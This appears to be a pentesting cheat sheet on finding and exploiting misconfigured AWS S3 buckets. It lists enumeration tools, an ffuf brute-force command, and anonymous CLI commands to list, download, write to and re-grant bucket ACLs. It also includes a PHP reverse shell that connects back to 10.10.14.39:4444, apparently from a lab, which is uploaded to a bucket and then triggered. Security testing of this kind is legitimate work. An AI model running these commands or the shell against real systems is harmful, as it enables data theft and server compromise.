S3 - Simple Storage Service

S3 misconfigurations

Amazon Simple Storage Service (S3) is the AWS service offering object-level storage for users and organizations.

Recon Tools

S3 Recon

awsome-websecurity-checklist/Mindmaps/S3-Bucket Recon.png at main · securitycipher/awsome-websecurity-checklistGitHub

s3enum

GitHub - koenrh/s3enum: Fast and stealthy Amazon S3 bucket enumeration tool for pentesters.GitHub

lazys3

GitHub - nahamsec/lazys3GitHub

BucketLoot

Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.

GitHub - redhuntlabs/BucketLoot: BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.GitHub

Bruteforce S3 buckets

GitHub - koaj/aws-s3-bucket-wordlist: Most common AWS S3 bucket names.GitHub

regions.txt

us-west-1
us-west-2
us-east-1
us-east-2
cn-north-1
cn-northwest-1
eu-central-1
eu-north-1
eu-west-1
eu-west-2
eu-west-3
ap-northeast-1
ap-northeast-2
ap-northeast-3
ap-south-1
ap-southeast-1
ap-southeast-2
ca-central-1
me-south-1
sa-east-1
us-gov-east-1
us-gov-west-1
ap-east-1

https://raw.githubusercontent.com/koaj/aws-s3-bucket-wordlist/master/list.txt

ffuf -u "https://hlogistics-ENVIRONMENT.s3.REGION.amazonaws.com" -w "regions.txt:REGION" -w "list.txt:ENVIRONMENT" -mc 200,403 -v 2>/dev/null

S3 Bucket Brute Force to BreachMedium

AWSBucketDump

GitHub - jordanpotti/AWSBucketDump: Security Tool to Look For Interesting Files in S3 BucketsGitHub

S3 Enumeration Basics

Check website source code - search for s3 url

By default, the AWS CLI includes prefix= (an empty prefix) and delimiter=/ in requests

Check for https://target.com.s3.amazonaws.com/?prefix=&delimiter=/

List bucket content - Anon

aws s3 ls s3://dev.target.com --no-sign-request

aws s3 ls s3://dev.target.com --no-sign-request --recursive

If you found an URL like http://target.s3.eu-west-2.amazonaws.com remove the s3.region.amazonaws.com part

aws s3 ls s3://target --no-sign-request

By default AWS cli tool interacts with s3.amazonaws.com . If you have another domain hosting it, you can use --endpoint-url option to point the tool to another domain.

List buckets - with profile

aws s3 ls --profile [profile-name]

aws s3api list-buckets --profile [profile-name]

List bucket content - authenticated

aws s3 ls s3://<bucket-name> --profile [profile]

Get Bucket Policy

aws s3api get-bucket-policy --bucket [bucket-name]
# Example
# aws s3api get-bucket-policy --bucket hl-it-admin

Download one file

aws s3 cp s3://hl-it-admin/flag.txt .

Download all files

aws s3 cp s3://hl-it-admin/backup-2807/ . --recursive

download all of the bucket’s contents:

aws s3 sync s3://cybr-sensitive-data-bucket-<ID> ~/Downloads --profile victim

List the bucket ACL

aws s3api get-bucket-acl --bucket [bucket-name]

List & get objects

$ aws s3api list-objects-v2 --bucket [bucket-name] --profile [profile-name]
$ aws s3api get-object --bucket [bucket-name] --key [key] --profile [profile] ./key.txt

Bucket policy

Bucket Policies are attached directly to the bucket and define what actions are allowed or denied by which principal.

aws s3api get-bucket-policy --bucket [bucket-name]

More readable

aws s3api get-bucket-policy --bucket [bucket-name] | jq -r '.Policy' | sed 's/\\//g' | jq

Enumeration - s3api

List of all the bucket in the AWS account

aws s3api list-buckets

Information about specified bucket ACLs

aws s3api get-bucket-acl --bucket [bucket-name]

Information about specified bucket policy

aws s3api get-bucket-policy --bucket [bucket-name]

Retrieve the Public Access Block configuration for an Amazon S3 bucket

aws s3api get-public-access-block --bucket [bucket-name]

List of all the objects in specified bucket

aws s3api list-objects --bucket [bucket-name]

ACLs information about the specified object

aws s3api get-object-acl --bucket [bucket-name] --key [object-name]

S3 Misconfiguration - Permissions

Hacking misconfigured AWS S3 buckets: A complete guideIntigriti

S3Scanner

GitHub - sa7mon/S3Scanner: Scan for open S3 buckets and dump the contentsGitHub

Checkov

checkov

Nuclei Templates

AWS Cloud Security Config Review using Nuclei TemplatesProjectDiscovery Blog

AWS Extender - Burp Extension

GitHub - VirtueSecurity/aws-extender: AWS Extender (Cloud Storage Tester) is a Burp plugin to assess permissions of cloud storage containers on AWS, Google Cloud and Azure.GitHub

List Permissions

aws s3 ls s3://{BUCKET_NAME} --no-sign-request

Read Permissions

aws s3api get-object --bucket {BUCKET_NAME} --key archive.zip ./OUTPUT --no-sign-request

Download Permissions

aws s3 cp s3://{BUCKET_NAME}/intigriti.txt ./ --no-sign-request

Write Permissions

aws s3 cp intigriti.txt s3://{BUCKET_NAME}/intigriti-ac5765a7-1337-4543-ab45-1d3c8b468ad3.txt --no-sign-request

Make sure to use a filename with a non-trivial name to prevent any disruption

Upload a shell

$ echo "<?php exec('/bin/bash -c \"bash -i >& /dev/tcp/10.10.14.39/4444 0>&1 \"');?>" > rs.php
$ aws s3 cp rs.php s3://adserver/rs.php --endpoint-url=http://s3.bucket.htb --no-sign-request

upload: ./rs.php to s3://adserver/rs.php 
$ curl http://bucket.htb/rs.php 

Read Permissions on ACL

aws s3api get-bucket-acl --bucket {BUCKET_NAME} --no-sign-request

aws s3api get-object-acl --bucket {BUCKET_NAME} --key index.html --no-sign-request

Write Permissions on ACL

aws s3api put-bucket-acl --bucket {BUCKET_NAME} --grant-full-control emailaddress={EMAIL} --no-sign-request

You do not have to always necessarily change an ACL to test for write permissions if read permissions are enabled. You can simply check the "Grants" property in the response to a read operation and verify if any unauthorized users are allowed to perform the write operation!

S3 Versioning

curl -sI http://target.s3.region.com/statis/js/auth.js

# Look for x-amz-id header

aws s3api get-bucket-versioning --bucket {BUCKET_NAME} --no-sign-request

List object versions.

aws s3api list-object-versions --bucket [bucket-name] --query "Versions[?VersionId!='null']" --no-sign-request

aws s3api get-object --bucket [bucket-name] --key "[key-name]" --version-id "[version-id]" filename.js --no-sign-request

S3 - Shadow Resources

Bucket Monopoly: Breaching AWS Accounts Through Shadow ResourcesAqua

Interesting Book

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• Advanced Penetration Testing: Hacking AWS 2 This book delves deeper into analyzing the security of various AWS services and shows techniques and tactics used by an attacker to breach an AWS environment

• Hands-On AWS Penetration Testing with Kali Linux Set up a virtual lab and pentest major AWS services, including EC2, S3, Lambda, and Cloud